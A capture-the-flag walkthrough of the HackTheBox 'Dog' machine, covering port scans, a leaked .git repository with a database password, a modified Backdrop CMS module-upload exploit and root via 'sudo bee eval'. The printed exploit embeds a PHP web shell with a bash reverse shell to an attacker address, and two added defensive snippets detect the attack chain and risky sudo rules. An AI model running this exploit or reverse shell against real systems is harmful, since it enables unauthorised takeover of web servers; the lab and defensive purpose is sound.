
HTB: Dog


0x01 Information Gathering

As usual, we open with the Tscan + fscan combination and see what information the scans turn up.

┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0
                                                                                          
[2025-03-31 23:44:57] [INFO] 暴力破解线程数: 1                                            
[2025-03-31 23:44:57] [INFO] 开始信息扫描
[2025-03-31 23:44:57] [INFO] 最终有效主机数量: 1
[2025-03-31 23:44:57] [INFO] 开始主机扫描
[2025-03-31 23:44:57] [INFO] 有效端口数量: 233
[2025-03-31 23:44:58] [SUCCESS] 端口开放 10.129.244.41:80
[2025-03-31 23:44:58] [SUCCESS] 端口开放 10.129.244.41:22
[2025-03-31 23:44:58] [SUCCESS] 服务识别 10.129.244.41:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.12 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12.]                                                                   
[2025-03-31 23:45:05] [SUCCESS] 服务识别 10.129.244.41:80 => [http]
[2025-03-31 23:45:05] [INFO] 存活端口数量: 2
[2025-03-31 23:45:05] [INFO] 开始漏洞扫描
[2025-03-31 23:45:05] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-31 23:45:05] [SUCCESS] 网站标题 http://10.129.244.41      状态码:200 长度:13368  标题:Home | Dog                                                                           
[2025-03-31 23:45:05] [SUCCESS] 发现指纹 目标: http://10.129.244.41      指纹: [CMS]
[2025-03-31 23:45:30] [SUCCESS] 扫描已完成: 3/3

 _____                             ___  _             
/__   \ ___   ___   __ _  _ __    / _ \| | _   _  ___ 
  / /\// __| / __| / _' || '_ \  / /_)/| || | | |/ __|
 / /   \__ \| (__ | (_| || | | |/ ___/ | || |_| |\__ \
 \/    |___/ \___| \__,_||_| |_|\/     |_| \__,_||___/

https://github.com/TideSec/TscanPlus
TscanClient Version: 2.7.4  NewVersion: 2.7.5  Expired: 2026.01.01
[23:50:07] [INFO] Start IpScan:10.129.244.41
[23:50:07] [INFO] 开始扫描 1 个主机的 65535 个端口,共 65535 个任务

端口扫描   0% [░░░░░░░░░░░░░░░░░░░░] (14/65535) [0s:19m47s]
[23:50:08] [+] 10.129.244.41:22 open
[23:50:08] [+] 10.129.244.41:80 open
[23:50:08] [+] [TCP/SSH]  [OpenSSH 8.2p1 Ubuntu 4ubuntu0.12] 10.129.244.41:22 [SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12]                                                            
[23:50:08] [INFO] start SSH check 10.129.244.41:22
[23:50:08] [+] 开始 SshScan 任务: SSH://10.129.244.41:22
[23:50:09] [+] [TCP/HTTP] [200] [Apache/2.4.41 (Ubuntu)][Apache-Web-Server][Apache-HTTP-Server/2.4.41][panabit智能网关][jQuery] http://10.129.244.41:80 [Home | Dog]                
                                                            
[23:50:25] [+] alive ports is: 2
[23:50:25] [+] Ip扫描结束:10.129.244.41
[23:50:25] [INFO] Start UrlScan:http://10.129.244.41:80
[23:50:26] [+] [TCP/HTTP] [200] [Apache-HTTP-Server/2.4.41][Apache/2.4.41 (Ubuntu)][jQuery][Apache-Web-Server][panabit智能网关] http://10.129.244.41:80 [Home | Dog]
                                                 
[23:50:26] [+] Url扫描结束:http://10.129.244.41:80
[23:50:26] [+] 项目任务完成:Default, Timeuse:18.891383758
[23:50:26] [+] 扫描结束,耗时: 19.692145367s

Only ports 80 and 22 came back. We start by probing the HTTP service, which turns out to be running Backdrop CMS. A first attempt at SQL injection on the login form has no effect. Since the CMS name is handed to us directly, we search for Backdrop CMS exploits next, and run a directory scan for the admin panel at the same time.

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/HTB/Dog/reports/http_10.129.244.41/__25-04-01_01-58-16.txt

Target: http://10.129.244.41/

[01:58:17] Starting: 
[01:58:21] 200 -  410B  - /.git/branches/                                   
[01:58:21] 200 -  605B  - /.git/
[01:58:21] 200 -   95B  - /.git/COMMIT_EDITMSG
[01:58:21] 200 -   92B  - /.git/config
[01:58:21] 200 -   23B  - /.git/HEAD                                        
[01:58:21] 200 -   73B  - /.git/description
[01:58:21] 200 -  651B  - /.git/hooks/
[01:58:21] 200 -  456B  - /.git/info/                                       
[01:58:21] 200 -  240B  - /.git/info/exclude                                
[01:58:21] 200 -  477B  - /.git/logs/                                       
[01:58:21] 200 -  230B  - /.git/logs/HEAD
[01:58:21] 200 -  230B  - /.git/logs/refs/heads/master                      
[01:58:21] 200 -   41B  - /.git/refs/heads/master                           
[01:58:21] 200 -  460B  - /.git/refs/
[01:58:21] 200 -    2KB - /.git/objects/                                    
[01:58:22] 200 -  337KB - /.git/index                                       
[01:59:06] 200 -  586B  - /files/                                           
[01:59:12] 200 -    4KB - /index.php                                        
[01:59:16] 200 -  456B  - /layouts/                                         
[01:59:17] 200 -    7KB - /LICENSE.txt                                      
[01:59:25] 200 -  405B  - /modules/                                         
[01:59:40] 200 -    5KB - /README.md                                        
[01:59:41] 200 -  528B  - /robots.txt                                       
[01:59:45] 200 -    0B  - /settings.php                                     
[01:59:55] 200 -  454B  - /themes/                                          
                                                                             
Task Completed

0x02 .git leak + Backdrop CVE to get a shell

A classic but rarely seen .git leak; we use GitHack to pull it down. The MySQL password in the configuration is BackDropJ2024DS2024, so next we look through the files for an account name with a recursive grep.

┌──(root㉿kali)-[/home/…/HTB/Dog/GitHack/10.129.244.41]
└─# grep -rnE '@dog.htb' .
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:12:        "tiffany@dog.htb"

That turns up the tiffany account, and we try logging in with it and the database password. Searching for Backdrop CMS exploits shows an RCE that matches this version.

┌──(root㉿kali)-[/home/…/HTB/Dog/GitHack/10.129.244.41]
└─# searchsploit backdrop       
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Backdrop CMS 1.20.0 - 'Multiple' Cross-Sit | php/webapps/50323.html
Backdrop CMS 1.23.0 - Stored XSS           | php/webapps/51905.txt
Backdrop CMS 1.27.1 - Authenticated Remote | php/webapps/52021.py
Backdrop Cms v1.25.1 - Stored Cross-Site S | php/webapps/51597.txt
------------------------------------------- ---------------------------------

Download the exploit and inspect it. Note that on this box the upload whitelist was changed from zip to tar, so the exploit has to be modified accordingly to meet that requirement.

import os
import time
import tarfile

def create_files():
    info_content = """
    type = module
    name = Block
    description = Controls the visual building blocks a page is constructed
    with. Blocks are boxes of content rendered into an area, or region, of a
    web page.
    package = Layouts
    tags[] = Blocks
    tags[] = Site Architecture
    version = BACKDROP_VERSION
    backdrop = 1.x

    configure = admin/structure/block

    ; Added by Backdrop CMS packaging script on 2024-03-07
    project = backdrop
    version = 1.27.1
    timestamp = 1709862662
    """
    shell_info_path = "shell/shell.info"
    os.makedirs(os.path.dirname(shell_info_path), exist_ok=True)
    with open(shell_info_path, "w") as file:
        file.write(info_content)

    shell_content = """
    <html>
    <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    system("bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/54311 0>&1'");
    ?>
    </pre>
    </body>
    </html>
    """
    shell_php_path = "shell/shell.php"
    with open(shell_php_path, "w") as file:
        file.write(shell_content)
    return shell_info_path, shell_php_path

def create_tar(info_path, php_path):
    tar_filename = "shell.tar"
    with tarfile.open(tar_filename, "w") as tarf:
        tarf.add(info_path, arcname='shell/shell.info')
        tarf.add(php_path, arcname='shell/shell.php')
    return tar_filename

def main(url):
    print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
    time.sleep(3)

    print("Evil module generating...")
    time.sleep(2)

    info_path, php_path = create_files()
    tar_filename = create_tar(info_path, php_path)

    print("Evil module generated!", tar_filename)
    time.sleep(2)

    print("Go to " + url + "/?q=admin/installer/manual and upload the " +
          tar_filename + " for Manual Installation.")
    time.sleep(2)

    print("Your shell address:", url + "/modules/shell/shell.php")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python script.py [url]")
    else:
        main(sys.argv[1])
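The .git enumeration, the upload through the manual installer and the first request for the dropped module file all leave traces in the web server's access log. As an added example (not part of this writeup or of the exploit above), the following Python classifies Apache combined-format log lines modelled on that sequence and reports which client showed the full chain; the log lines, client IPs and timestamps are constructed, and the endpoint and module path come from the writeup.

```python
import re
from collections import Counter

# Constructed sample Apache access-log lines, modelled on the request sequence in
# this writeup: .git enumeration, an upload via the manual installer, then a
# direct hit on the dropped PHP file under /modules/. IPs/timestamps are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Apr/2025:01:58:21 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Apr/2025:01:58:21 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Apr/2025:01:58:22 +0000] "GET /.git/index HTTP/1.1" 200 345088 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Apr/2025:02:10:03 +0000] "POST /?q=admin/installer/manual HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Apr/2025:02:10:09 +0000] "GET /modules/shell/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.20 - - [01/Apr/2025:02:11:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(method, path, status):
    """Return the indicator tags for one request, or [] when it looks benign."""
    tags = []
    # A 200 for anything inside /.git/ means repository metadata is web-reachable.
    if re.search(r'(^|/)\.git(/|$)', path) and status == 200:
        tags.append('git-exposed')
    # Manual module install endpoint; the writeup's exploit uploads its tar here.
    if method == 'POST' and 'admin/installer/manual' in path:
        tags.append('module-upload')
    # Backdrop pages are served through index.php; a direct request for a .php
    # file under /modules/ is how the dropped web shell gets reached.
    if re.match(r'^/modules/[^?]+\.php', path):
        tags.append('direct-module-php')
    return tags

def scan_log(text):
    """Parse access-log lines and return {client_ip: Counter(tag -> hits)}."""
    findings = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # tolerate lines that do not parse instead of crashing
        tags = classify(m['method'], m['path'], int(m['status']))
        if tags:
            findings.setdefault(m['ip'], Counter()).update(tags)
    return findings

def chained_intrusion(findings, ip):
    """True when one client shows the whole recon -> upload -> execute chain."""
    c = findings.get(ip, Counter())
    return all(c[t] for t in ('git-exposed', 'module-upload', 'direct-module-php'))
```

Any 200 on a /.git/ path alone is already worth an alert; the chain check is there to rank the client that went on to upload and execute code.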

After catching the reverse shell we leave an AntSword backdoor, connect through it, and check whether the MySQL database holds anything. It yields a few accounts and password hashes. We first look at the home directory to see which login users exist on this box.

Only these two users turn up. Trying the earlier database password again, johncusack actually logs in, and user.txt sits in that user's home directory.

0x03 Privilege escalation via bee

Running sudo -l to check the account's privileges reveals a bee command. No privilege-escalation instructions for it exist online, so we have to work out ourselves what this thing does.

johncusack@dog:~$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

Point it at Backdrop's root directory and run it through sudo, and it will do anything as root.

johncusack@dog:~$ sudo bee --root=/var/www/html eval "system('cat /root/root.txt');"
57a494e6db07d5254624f6cda5b0e52c
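The misconfiguration behind this step is the sudoers rule itself: a CLI that can evaluate code, granted to a user as root with no argument restriction. As an added example (not from the writeup), this Python audits sudoers-style rule lines for such grants; the rule lines are constructed, with the bee rule mirroring the sudo -l output above and the other rules invented for comparison. It assumes /etc/sudoers file syntax rather than the sudo -l output format.

```python
import re

# Constructed sudoers-style rules. The johncusack/bee rule mirrors the one shown
# by `sudo -l` in this writeup; the other three are invented for comparison.
SAMPLE_RULES = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
johncusack ALL=(ALL : ALL) /usr/local/bin/bee
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
backup  ALL=(root) /usr/bin/php /opt/backup/run.php
"""

# Binaries that execute caller-supplied code when they run with no fixed arguments.
# bee is listed because `bee eval` runs PHP as the invoking (here: root) user.
CODE_RUNNERS = {'bee', 'php', 'python', 'python3', 'perl', 'ruby', 'bash', 'sh'}

RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')

def audit_rule(line):
    """Return a finding dict for a risky rule, or None when the rule looks fine."""
    line = line.strip()
    if not line or line.startswith('#'):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    for cmd in (c.strip() for c in m['cmds'].split(',')):
        if cmd == 'ALL':
            continue  # full sudo is an explicit policy choice, not a stray grant
        argv = cmd.split()
        binary = argv[0].rsplit('/', 1)[-1]
        if binary in CODE_RUNNERS and len(argv) == 1:
            # No arguments pinned in the rule, so the user decides what gets run;
            # pinning the exact subcommand/script (as the backup rule does) fixes it.
            return {'user': m['user'], 'runas': m['runas'].replace(' ', ''),
                    'binary': binary, 'reason': 'unrestricted code runner'}
    return None

def audit(text):
    """Audit every rule line in a sudoers-style text and return the findings."""
    return [f for f in map(audit_rule, text.splitlines()) if f]
```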

0x04 Summary

A very basic box that lives up to its easy rating; finally one I could blow through comfortably.